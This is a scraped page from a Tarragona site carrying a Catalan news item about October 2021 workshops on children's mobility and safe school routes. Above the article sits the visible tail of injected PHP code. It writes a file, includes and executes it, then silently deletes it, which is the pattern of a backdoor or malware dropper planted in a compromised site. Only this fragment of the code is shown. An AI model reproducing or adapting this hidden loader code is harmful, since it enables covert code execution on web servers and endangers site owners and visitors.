");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Tarragona organitza tallers formatius per debatre sobre la mobilitat a la ciutat amb perspectiva d'infància
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'Ajuntament de Tarragona organitza tallers formatius per debatre sobre la mobilitat a la ciutat amb perspectiva d'infància (18/10/2021)

Aquesta setmana tindran lloc un parell de tallers per tal de compartir visió de com ha de ser la mobilitat a la ciutat en perspectiva d'infància. El primer es durà a terme demà 19 d’octubre i està dirigit a docents i a les AFAs. L’endemà dia 20 al matí, s’ha organitzat un taller per a tècnics municipals de diferents departaments.

Els dos tallers es faran a les dependències de la Guàrdia Urbana, i seran conduïts per la geògrafa Marta Roman de la consultora Gea21.

Aquestes formacions s’enmarquen en el projecte de Camins Escolars de la ciutat que s’impulsa des del Consell Escolar Municipal a través de la Comissió Camins Escolars i Mobilitat. Aquest projecte neix a partir de la necessitat de millorar la mobilitat a l’entorn dels centres educatius i fomentar hàbits de mobilitat saludables i educatius.

Un Camí Escolar és un itinerari d’anada i tornada a l’escola segur, acollidor i formatiu, dissenyat a partir dels recorreguts més utilitzats per famílies i alumnat.

El projecte persegueix incrementar el trajecte a peu dels infants i adolescents: que puguin desplaçar-se més lliurement, d’una forma segura i autònoma de camí a l’escola i l’institut i de tornada a casa, alhora que s’ofereixen nous espais d’aprenentatge del seu entorn quotidià, i es fomenten hàbits saludables de mobilitat.

Font: Ajuntament de Tarragona

L'Ajuntament de Tarragona organitza tallers formatius per debatre sobre la mobilitat a la ciutat amb perspectiva d'infància

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona